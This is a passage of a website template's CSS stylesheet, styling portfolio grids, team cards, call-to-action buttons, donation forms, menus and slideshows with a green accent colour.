  border: 1px solid #dddddd;
  width: 3rem;
  height: 3rem;
  line-height: 3rem;
  text-align: center;
  cursor: pointer;
  display: inline-block;
  -webkit-transition: 0.2s;
  -moz-transition: 0.2s;
  transition: 0.2s;
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media:hover {
  color: #ffffff;
  background: #4f953b;
  border-color: #4f953b;
}
@media only all and (max-width: 47.99rem) {
  .g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .button-media {
    width: 2.5rem;
    height: 2.5rem;
    line-height: 1.5rem;
    padding: 0.5rem;
  }
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .g-media-box-play {
  position: absolute;
  margin-top: -2.5rem;
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-links .g-item-text {
  visibility: hidden;
  position: absolute;
  width: 0;
  height: 0;
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-desc {
  margin: 1.5rem 0;
  padding-bottom: 1.5rem;
  border-bottom: 1px solid #dddddd;
}
.g-media-box .g-media-box-item .g-media-box-content .g-media-box-special1, .g-media-box .g-media-box-item .g-media-box-content .g-media-box-special2 {
  margin: 0;
}
.g-paypaldonate {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
  text-align: center;
}
.g-paypaldonate .g-paypaldonate-form form {
  margin: 0;
}
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button .g-paypaldonate-icon {
  padding: 1.5rem;
  background: rgba(0, 0, 0, 0.2);
}
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button input[type="submit"] {
  background: transparent;
  padding: 1.25rem;
  margin-top: -3px;
}
.g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button.button {
  padding: 0;
  border: 0;
}
.g-portfolio .g-portfolio-filter {
  margin-bottom: 30px;
}
.g-portfolio .g-portfolio-filter.uk-subnav > * > * {
  color: #959595;
}
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  padding: 3px 8px;
  border: 1px solid #dddddd;
  background: #ffffff;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *:focus, .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *:hover {
  background: #ffffff;
  box-shadow: none;
  border: 1px solid #4f953b;
  color: #4f953b;
}
.g-portfolio .g-portfolio-filter .uk-active > a {
  background: #ffffff;
  border: 1px solid #4f953b;
  color: #4f953b;
  box-shadow: none;
}
.g-portfolio .g-portfolio-item {
  border: 1px solid #dddddd;
}
.g-portfolio.gutter-disabled .g-portfolio-item {
  border: none;
}
.g-portfolio .g-portfolio-image > a {
  display: block;
}
.g-portfolio .g-info-container {
  padding: 20px;
  background: #ffffff;
}
.g-portfolio p {
  margin: 0;
}
.g-portfolio .g-portfolio-title {
  margin: 0;
}
.g-portfolio .g-portfolio-title a {
  color: #282828;
}
.g-portfolio .g-portfolio-title a:hover {
  color: #4f953b;
}
.g-portfolio .g-item-details {
  margin-top: 10px;
  font-size: 90%;
  color: #c8c8c8;
  font-style: italic;
}
.g-portfolio .g-item-details i {
  margin-right: 5px;
}
.g-portfolio .g-portfolio-desc {
  margin-top: 10px;
}
.g-portfolio .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
.g-portfolio .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
.g-portfolio .g-info-container-style2.uk-overlay-panel a {
  color: #ffffff;
}
.g-portfolio .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
.g-portfolio .g-info-container-style2 .g-portfolio-special, .g-portfolio .g-info-container-style2 .g-item-details {
  color: #eee;
}
.g-portfolio .g-portfolio-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-portfolio .g-portfolio-special {
    float: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-portfolio .g-portfolio-special {
    float: none;
  }
}
.g-portfolio .g-portfolio-special i {
  margin-right: 5px;
}
.g-portfolio .g-portfolio-link {
  float: right;
  font-style: italic;
}
.g-portfolio .g-portfolio-link i {
  margin-left: 10px;
}
@media only all and (max-width: 30rem) {
  .g-portfolio .g-portfolio-link {
    float: none;
    margin-top: 5px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-portfolio .g-portfolio-link {
    float: none;
    margin-top: 5px;
  }
}
.g-portfolio .no-special .g-portfolio-link {
  float: none;
}
.g-portfolio .no-link .g-portfolio-special {
  float: none;
}
.g-portfolio .g-bottom-info {
  margin-top: 15px;
}
.g-portfolio.style3 .g-info-container {
  position: absolute;
  visibility: hidden;
  z-index: 9;
  opacity: 0;
  border: 1px solid #dddddd;
  border-top: none;
  width: 100%;
  -webkit-transition: opacity 0.3s;
  -moz-transition: opacity 0.3s;
  transition: opacity 0.3s;
}
.g-portfolio.style3 .g-portfolio-item {
  border: none;
  position: relative;
}
.g-portfolio.style3 .g-portfolio-item:hover .g-info-container {
  visibility: visible;
  opacity: 1;
}
.g-portfolio.style4 .g-info-container-style2 {
  background: -webkit-linear-gradient(top, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
.g-portfolio.style4 .g-info-container-style2 a {
  color: #ffffff;
}
.g-portfolio.style4 .g-info-container-style2 a:hover {
  color: #ffffff;
  text-decoration: underline;
}
.g-portfolio.style4 .g-portfolio-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
.g-portfolio.style4 .g-portfolio-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
.portfolio-special .g-portfolio-filter {
  text-align: center;
  position: relative;
  top: -50px;
  margin-bottom: 0;
  justify-content: center;
}
#g-fullwidth .g-portfolio.gutter-enabled, .g-flushed .g-portfolio.gutter-enabled {
  padding: 30px;
}
#g-fullwidth .g-portfolio.filters-enabled.gutter-enabled, .g-flushed .g-portfolio.filters-enabled.gutter-enabled {
  padding-top: 0;
}
#g-fullwidth .g-portfolio .g-portfolio-filter, .g-flushed .g-portfolio .g-portfolio-filter {
  border-bottom: 1px solid #f0f0f0;
}
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  padding: 0;
  border: none;
  height: 50px;
  width: 100%;
  line-height: 50px;
  font-weight: bold;
  font-size: 1rem;
  border-radius: 0;
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    font-size: 0.9rem;
    font-weight: normal;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    height: auto;
    line-height: inherit;
    padding: 13px 0;
    font-size: 0.8rem;
    font-weight: normal;
  }
}
@media only all and (max-width: 47.99rem) {
  #g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
    height: auto;
    line-height: inherit;
    padding: 13px 0;
    font-size: 0.8rem;
    font-weight: normal;
  }
}
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav {
  margin-left: -30px;
  margin-right: -30px;
}
#g-fullwidth .g-portfolio .g-portfolio-filter.uk-subnav > *, .g-flushed .g-portfolio .g-portfolio-filter.uk-subnav > * {
  padding-left: 0;
  border-right: 1px solid #f0f0f0;
  -webkit-box-flex: 1;
  -moz-box-flex: 1;
  box-flex: 1;
  -webkit-flex: 1;
  -moz-flex: 1;
  -ms-flex: 1;
  flex: 1;
  text-align: center;
}
#g-fullwidth .g-portfolio.gutter-disabled .g-portfolio-filter, .g-flushed .g-portfolio.gutter-disabled .g-portfolio-filter {
  margin-bottom: 0;
}
#g-fullwidth .g-portfolio.gutter-disabled .g-portfolio-filter.uk-subnav, .g-flushed .g-portfolio.gutter-disabled .g-portfolio-filter.uk-subnav {
  padding: 0 30px;
}
.uk-tooltip.g-portfolio-tooltip {
  padding: 6px 12px;
  font-size: 13px;
}
.g-cta-button.style1 .g-cta-inner {
  padding: 30px;
  border: 1px solid #dddddd;
  border-left: 2px solid #4f953b;
  background: #ffffff;
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  .g-cta-button.style1 .g-cta-inner {
    padding: 20px;
  }
}
.g-cta-button.style1 .g-cta-inner .g-cta-left {
  float: left;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
  }
}
.g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
  margin: 12px 0 0;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
.g-cta-button.style1 .g-cta-inner .g-cta-right {
  float: right;
  margin-top: 4px;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
.g-cta-button.style1 .g-cta-inner .g-cta-right.no-desc {
  margin-top: 0;
}
.g-cta-button.style1 .g-cta-inner .g-cta-right .button {
  font-size: 1rem;
  padding: 1rem 1.5rem;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  .g-cta-button.style1 .g-cta-inner .g-cta-right .button {
    padding: 1rem;
  }
}
.g-cta-button.style1 .g-cta-inner .g-cta-right .button i {
  margin-right: 10px;
}
.g-cta-button.style1 .g-cta-inner .g-cta-title {
  margin: 0 0 10px;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style2 .g-cta-inner {
    margin-bottom: 1.5rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style2 .g-cta-inner {
    margin-bottom: 1.5rem;
  }
}
.g-cta-button.style2 .g-cta-inner .g-cta-left {
  float: left;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left {
    float: none;
    display: block;
    text-align: center;
  }
}
.g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
  margin: 12px 0 0;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-left.no-desc .g-cta-title {
    margin-bottom: 25px;
  }
}
.g-cta-button.style2 .g-cta-inner .g-cta-right {
  float: right;
  margin-top: 4px;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right {
    float: none;
    display: block;
    margin-top: 25px;
  }
}
.g-cta-button.style2 .g-cta-inner .g-cta-right.no-desc {
  margin-top: 0;
}
.g-cta-button.style2 .g-cta-inner .g-cta-right .button {
  font-size: 1rem;
  padding: 1rem 1.5rem;
  background-color: transparent;
  color: #4f953b;
  border: 2px solid #4f953b;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.g-cta-button.style2 .g-cta-inner .g-cta-right .button:hover {
  background-color: #4f953b;
  color: #ffffff;
}
@media only all and (max-width: 47.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    padding: 1rem;
  }
}
.g-cta-button.style2 .g-cta-inner .g-cta-right .button i {
  margin-right: 10px;
}
.g-cta-button.style2 .g-cta-inner .g-cta-title {
  margin: 0 0 10px;
}
.g-page-title {
  text-align: center;
}
@media only all and (max-width: 47.99rem) {
  .g-page-title {
    margin-bottom: -30px;
  }
}
.g-page-title h3 {
  margin: 0;
}
.g-page-title i {
  display: block;
}
.g-our-team:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-our-team:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
.g-our-team:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-our-team:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-our-team-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-our-team:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-our-team:not(.gutter-disabled) .g-our-team-item {
    margin-bottom: 1.876rem !important;
  }
}
.g-our-team .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.99rem) {
  .g-our-team .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
.g-our-team .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.99rem) {
  .g-our-team .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
.g-our-team, .g-our-team-slider, .g-our-team-slideset {
  text-align: center;
}
.g-our-team.gutter-disabled .g-our-team-item, .g-our-team-slider.gutter-disabled .g-our-team-item, .g-our-team-slideset.gutter-disabled .g-our-team-item {
  border: none;
}
.g-our-team.gutter-disabled .uk-slideset, .g-our-team-slider.gutter-disabled .uk-slideset, .g-our-team-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
.g-our-team.gutter-disabled .uk-slideset.uk-grid > *, .g-our-team-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-our-team-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
.g-our-team .g-content, .g-our-team-slider .g-content, .g-our-team-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-our-team .g-our-team-item, .g-our-team-slider .g-our-team-item, .g-our-team-slideset .g-our-team-item {
  border: 1px solid #dddddd;
  width: 100%;
}
@media only all and (max-width: 47.99rem) {
  .g-our-team .g-our-team-item, .g-our-team-slider .g-our-team-item, .g-our-team-slideset .g-our-team-item {
    margin-bottom: 3.126rem;
    width: 100%;
  }
  .g-our-team .g-our-team-item:last-child, .g-our-team-slider .g-our-team-item:last-child, .g-our-team-slideset .g-our-team-item:last-child {
    margin-bottom: 0;
  }
}
.g-our-team .g-our-team-image, .g-our-team-slider .g-our-team-image, .g-our-team-slideset .g-our-team-image {
  position: relative;
  overflow: hidden;
}
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel {
  padding: 0;
}
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a {
  width: 100%;
  display: block;
  padding: 10px;
  border: 1px solid rgba(255, 255, 255, 0.2);
  border-right: none;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a {
    padding: 10px 5px;
  }
}
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover {
  background: #4f953b;
}
@media only all and (max-width: 47.99rem) {
  .g-our-team .g-our-team-image .g-our-team-social .g-block, .g-our-team-slider .g-our-team-image .g-our-team-social .g-block, .g-our-team-slideset .g-our-team-image .g-our-team-social .g-block {
    -webkit-box-flex: 1;
    -moz-box-flex: 1;
    box-flex: 1;
    -webkit-flex: 1;
    -moz-flex: 1;
    -ms-flex: 1;
    flex: 1;
  }
}
.g-our-team .g-our-team-image img, .g-our-team-slider .g-our-team-image img, .g-our-team-slideset .g-our-team-image img {
  width: 100%;
}
.g-our-team .g-info-container, .g-our-team-slider .g-info-container, .g-our-team-slideset .g-info-container {
  padding: 20px;
  background: #ffffff;
}
.g-our-team p, .g-our-team-slider p, .g-our-team-slideset p {
  margin: 0;
}
.g-our-team .g-our-team-name, .g-our-team-slider .g-our-team-name, .g-our-team-slideset .g-our-team-name {
  margin: 0;
}
.g-our-team .g-our-team-name a, .g-our-team-slider .g-our-team-name a, .g-our-team-slideset .g-our-team-name a {
  color: #282828;
}
.g-our-team .g-our-team-name a:hover, .g-our-team-slider .g-our-team-name a:hover, .g-our-team-slideset .g-our-team-name a:hover {
  color: #4f953b;
}
.g-our-team .g-our-team-position, .g-our-team-slider .g-our-team-position, .g-our-team-slideset .g-our-team-position {
  margin-top: 0;
  font-size: 90%;
}
.g-our-team .g-our-team-position.g-desc-enabled, .g-our-team-slider .g-our-team-position.g-desc-enabled, .g-our-team-slideset .g-our-team-position.g-desc-enabled {
  margin-bottom: 20px;
}
.g-our-team .g-our-team-desc, .g-our-team-slider .g-our-team-desc, .g-our-team-slideset .g-our-team-desc {
  margin-top: 0.4rem;
}
.g-our-team.style2 .g-our-team-social, .g-our-team-slider.style2 .g-our-team-social, .g-our-team-slideset.style2 .g-our-team-social {
  margin-top: 20px;
}
.g-our-team.style2 .g-our-team-social a, .g-our-team-slider.style2 .g-our-team-social a, .g-our-team-slideset.style2 .g-our-team-social a {
  color: #4e4e4e;
  margin-right: 15px;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-our-team.style2 .g-our-team-social a, .g-our-team-slider.style2 .g-our-team-social a, .g-our-team-slideset.style2 .g-our-team-social a {
    margin-right: 8px;
  }
}
.g-our-team.style2 .g-our-team-social a:last-child, .g-our-team-slider.style2 .g-our-team-social a:last-child, .g-our-team-slideset.style2 .g-our-team-social a:last-child {
  margin-right: 0;
}
.g-our-team.style2 .g-our-team-social a:hover, .g-our-team-slider.style2 .g-our-team-social a:hover, .g-our-team-slideset.style2 .g-our-team-social a:hover {
  color: #4f953b;
}
.g-our-team.uk-text-left.style1 .g-our-team-social, .g-our-team-slider.uk-text-left.style1 .g-our-team-social, .g-our-team-slideset.uk-text-left.style1 .g-our-team-social {
  text-align: center !important;
}
.g-our-team.style3 .g-our-team-image, .g-our-team-slider.style3 .g-our-team-image, .g-our-team-slideset.style3 .g-our-team-image {
  padding-bottom: 100px;
}
.g-our-team.style3 .g-info-container, .g-our-team-slider.style3 .g-info-container, .g-our-team-slideset.style3 .g-info-container {
  position: absolute;
  bottom: 0;
  left: 0;
  right: 0;
  top: auto;
  z-index: 1;
  padding: 23px 30px;
  height: 100px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.g-our-team.style3 .g-info-container .g-our-team-position, .g-our-team-slider.style3 .g-info-container .g-our-team-position, .g-our-team-slideset.style3 .g-info-container .g-our-team-position {
  margin: 5px 0 0;
}
.g-our-team.style3 .g-hover-container, .g-our-team-slider.style3 .g-hover-container, .g-our-team-slideset.style3 .g-hover-container {
  opacity: 0;
  position: absolute;
  background-color: #111111;
  color: #ffffff;
  top: 100px;
  left: 0;
  bottom: 0;
  right: 0;
  padding: 30px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.g-our-team.style3 .g-hover-container > *, .g-our-team-slider.style3 .g-hover-container > *, .g-our-team-slideset.style3 .g-hover-container > * {
  opacity: 0;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.g-our-team.style3 .g-hover-container .g-our-team-desc, .g-our-team-slider.style3 .g-hover-container .g-our-team-desc, .g-our-team-slideset.style3 .g-hover-container .g-our-team-desc {
  font-size: 90%;
}
.g-our-team.style3 .g-hover-container .g-our-team-social, .g-our-team-slider.style3 .g-hover-container .g-our-team-social, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social {
  margin-top: 25px;
  font-size: 18px;
}
.g-our-team.style3 .g-hover-container .g-our-team-social a, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a {
  margin-right: 15px;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-our-team.style3 .g-hover-container .g-our-team-social a, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a {
    margin-right: 8px;
  }
}
.g-our-team.style3 .g-hover-container .g-our-team-social a:last-child, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a:last-child, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a:last-child {
  margin-right: 0;
}
.g-our-team.style3 .g-our-team-item, .g-our-team-slider.style3 .g-our-team-item, .g-our-team-slideset.style3 .g-our-team-item {
  position: relative;
}
.g-our-team.style3 .g-our-team-item:hover .g-hover-container, .g-our-team-slider.style3 .g-our-team-item:hover .g-hover-container, .g-our-team-slideset.style3 .g-our-team-item:hover .g-hover-container {
  opacity: 1;
}
.g-our-team.style3 .g-our-team-item:hover .g-hover-container > *, .g-our-team-slider.style3 .g-our-team-item:hover .g-hover-container > *, .g-our-team-slideset.style3 .g-our-team-item:hover .g-hover-container > * {
  -webkit-transition-delay: 0.3s;
  -moz-transition-delay: 0.3s;
  transition-delay: 0.3s;
  opacity: 1;
}
.g-our-team.style3 .g-our-team-item:hover .g-info-container, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container {
  bottom: 100%;
  margin-bottom: -100px;
  background: #4f953b;
  color: #ffffff;
}
.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name {
  color: #ffffff !important;
}
.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a {
  color: #ffffff !important;
}
.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover {
  text-decoration: underline;
}
.g-onepage-menu ul {
  margin: 0;
  list-style: none;
  background: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 3px;
}
.g-onepage-menu ul li a {
  padding: 0.625rem 1.25rem;
  color: #959595;
  display: block;
  border-bottom: 1px solid #dddddd;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
.g-onepage-menu ul li a:hover {
  background: #dddddd;
  color: #626262;
}
.g-onepage-menu ul li a i {
  margin-right: 5px;
}
.g-onepage-menu ul li:last-child a {
  border-bottom: none;
}
.g-onepage-menu ul li .submenu {
  border: none;
  display: none;
}
.g-onepage-menu ul li .submenu.uk-active {
  display: block;
}
.g-onepage-menu ul li .submenu.uk-active a {
  padding-left: 35px;
}
.g-onepage-menu ul li .submenu li:last-child {
  border-bottom: 1px solid #dddddd;
}
.g-onepage-menu ul li.uk-active > a {
  background: #dddddd;
  color: #4f953b;
}
.g-onepage-menu ul li.uk-active .submenu {
  display: block;
}
.g-onepage-menu ul li.uk-active .submenu a {
  padding-left: 35px;
}
body .g-particle-intro {
  margin-bottom: 3rem;
  text-align: center;
}
body .g-particle-intro .g-particle-intro {
  margin-bottom: 3rem;
}
body .g-particle-intro .g-main-title {
  margin-bottom: 0;
}
body .g-particle-intro .g-title-separator {
  height: 1px;
  width: 70px;
  margin: 20px auto;
  background: #dddddd;
}
body .g-particle-intro .g-title-separator.no-intro-text {
  margin: 2.5rem auto 0;
}
#g-to-top .style1 #g-totop-button {
  border-radius: 0;
}
.g-image-features .g-image-features-item {
  box-shadow: none;
  border-radius: 0;
}
.g-image-features .g-image-features-image {
  position: relative;
}
.g-image-features .g-image-features-image img {
  border-radius: 0;
}
.g-image-features .g-image-features-image.uk-overlay {
  border-radius: 0;
}
.g-image-features .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #ffffff;
}
.g-image-features .g-image-features-link {
  font-style: initial;
  border-bottom: 1px solid #4f953b;
  display: inline-block;
}
.g-image-features .g-image-features-link i {
  display: none;
}
.g-features-particle .g-features-particle-icon, .g-features-particle .g-circle-border {
  border-radius: 0;
}
.g-features-particle .g-features-particle-item:hover .g-circle-border {
  border-color: #dddddd;
}
.g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0;
}
.g-slideshow .g-slideshow-title, .g-slideshow .g-slideshow-desc {
  color: #959595 !important;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .g-slideshow-title, .g-slideshow .g-slideshow-desc {
    display: initial;
  }
}
.g-slideshow .uk-overlay-background {
  background: transparent;
}
.g-slideshow .style2 .g-slideshow-title {
  font-size: 3rem;
  color: #959595 !important;
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .style2 .g-slideshow-title {
    font-size: 1rem;
  }
}
.g-slideshow .style2 .g-slideshow-desc {
  font-size: 3rem;
  background: #4f953b;
  font-family: "Cormorant SC";
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .style2 .g-slideshow-desc {
    font-size: 1rem;
    display: initial;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-slideshow .uk-slideshow > li {
    min-height: 300px;
  }
}
.g-slideshow .uk-dotnav {
  margin-left: -15px;
}
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #dddddd;
}
.g-content-pro .g-content-pro-item .uk-overlay-bottom, .g-content-pro-slider .g-content-pro-item .uk-overlay-bottom, .g-content-pro-slideset .g-content-pro-item .uk-overlay-bottom {
  top: 0px;
}
.g-content-pro.style3 .g-content-pro-item, .g-content-pro-slider.style3 .g-content-pro-item, .g-content-pro-slideset.style3 .g-content-pro-item {
  border: none;
}
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: rgba(255, 255, 255, 0.9);
  border: 0px;
  margin: 1.5rem;
  display: -webkit-box;
  display: -moz-box;
  display: box;
  display: -webkit-flex;
  display: -moz-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -moz-box-align: center;
  box-align: center;
  -webkit-align-items: center;
  -moz-align-items: center;
  -ms-align-items: center;
  -o-align-items: center;
  align-items: center;
  -ms-flex-align: center;
  -webkit-align-content: center;
  -moz-align-content: center;
  align-content: center;
  -ms-flex-line-pack: center;
  -webkit-box-lines: multiple;
  -moz-box-lines: multiple;
  box-lines: multiple;
  -webkit-flex-wrap: wrap;
